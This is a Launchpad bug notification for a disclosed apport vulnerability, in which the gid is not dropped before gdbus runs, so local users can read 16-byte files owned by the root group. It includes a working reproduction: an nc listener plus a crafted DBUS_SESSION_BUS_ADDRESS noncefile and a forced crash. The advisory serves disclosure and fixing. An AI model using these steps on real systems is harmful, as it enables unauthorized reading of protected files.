** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1885633
Title: [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability Status in apport package in Ubuntu: Fix Released Status in apport source package in Xenial: Fix Released Status in apport source package in Bionic: Fix Released Status in apport source package in Eoan: Confirmed Status in apport source package in Focal: Fix Released Bug description: -- VULNERABILITY DETAILS ------------------------ * Version tested:18.04.4 LTS amd64 server * Installer file:ubuntu-18.04.4-live-server-amd64.iso * Platform tested:- --- ### Analysis Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group. It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes. reproduce step ``` ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile ubuntu@ubuntu:/tmp$ sudo chown root:root securefile ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile ubuntu@ubuntu:/tmp$ su - zdi Password: zdi@ubuntu:~$ id uid=1001(zdi) gid=1001(zdi) groups=1001(zdi) zdi@ubuntu:~$ cd /tmp/ zdi@ubuntu:/tmp$ ls -al securefile -r--r----- 1 root root 16 Jun 16 04:33 securefile zdi@ubuntu:/tmp$ cat securefile cat: securefile: Permission denied zdi@ubuntu:/tmp$ nc -lp 8888 & [1] 2034 zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 & [2] 2036 zdi@ubuntu:/tmp$ kill -11 2036 zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH zdi@ubuntu:/tmp$ ``` ~~~C++ orig_uid = os.geteuid() os.setresuid(-1, os.getuid(), -1) <-- did not set gid try: gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d', 'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m', 'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr}) (out, err) = gdbus.communicate() if err: error_log('gdbus call error: ' + err.decode('UTF-8')) except OSError as e: error_log('gdbus call failed, cannot determine running session: ' + str(e)) return False finally: os.setresuid(-1, orig_uid, -1) ~~~ -- CREDIT --------------------------------------- This vulnerability was discovered by: Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1885633/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp